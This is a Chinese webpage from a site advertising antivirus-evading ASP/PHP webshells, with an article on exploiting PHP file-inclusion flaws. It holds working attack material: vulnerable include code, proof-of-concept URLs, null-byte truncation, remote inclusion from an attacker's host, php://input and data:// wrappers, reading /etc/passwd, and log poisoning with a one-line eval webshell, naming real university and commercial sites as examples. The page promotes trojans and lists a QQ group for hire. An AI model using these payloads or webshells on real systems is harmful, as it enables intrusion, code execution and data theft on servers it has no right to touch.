php大马 小马巧用包含妙招 | 最新免杀asp木马|asp大马

火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

php大马 小马巧用包含妙招

2015-04-09

关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的…不过

大家都懒得测试,我就来整理下.

1.普通本地包含;

<?php
$query=$_GET['p'];

include($query);
?>

poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php为包含的路径.

baohan1.jpg

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。

2.截断本地包含
require_once($a.'.php');

include($a.".php");

等等类似此包含的函数..

WINDOWS下还有特别用处:

\.或者./或者\或者/截断 (WINDOWS都可以使用.)

[link href="WooYun: 快乐购某分站文件包含漏洞"]波波虎[/link]

截断的原理

[link href="WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link] (Linux .//可以.)

%00截断包含,有gpc=off和php版本限制

poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00

3.远程包含

allow_url_include=On就是远程文件包含了,为off那就只能本地包含了.

测试case:
<?php
$query=$_GET['p'];

include($query.".php");
?>

连接:http://www.baidu.com/explame.php?p=http://www.mumaasp.com/yeah.txt

爆错了:

Warning: main(http://www.mumaasp.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in

/var/www/htdocs/explame.php on line 3

include($query.".php");代码的缘故,在后面加上了”.php“,导致yeah.txt变成了yeah.txt.php.

这里我们不需要截断啦,来个360计之—-将计就计.

在www.axxer.com创建个yeah.php文件;

然后http://www.baidu.com/explame.php?p=http://www.mumaasp.com/yeah,自动在后面加

.php;多么爱。。。。

远程包含小连接

我们还可以用php自带协议来利用:

包含data:// 或者php://input 伪协议

这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。

http://www.schnelltest24.de/index.php?page=/etc/passwd//这个没有截断,我们尝试下用协议看看.

baohan2.jpg

利用协议然后POST发送利用代码,哈哈;多么有爱~~~~.

4.日记包含高级利用

[link href="WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link]

此连接已经透露出技巧了呢,连接思路简单说下:

(1)访问带有一句话的错误连接(http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx...),此连接将记录到error.log错误记录文件中.

(2)找到包含漏洞的地方,包含到error.log文件的路径.然后在自定义s参数中输入我们恶意代码. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././..........)

一先限制以及突破:
类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php
这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

可以使用:伪造没有Connection HTTP标头的请求包

一点连接:内容1

内容2

5.其他高级利用

(1)包含/proc/self/environ环境变量:
这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样

利用(文章中第四点有详细介绍了.)

(2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(2) (3)点介绍

phpinfo爆破包含pdf

 

  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/243.html
  • 分类:Php大马Php木马 | 标签: | 5,241人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>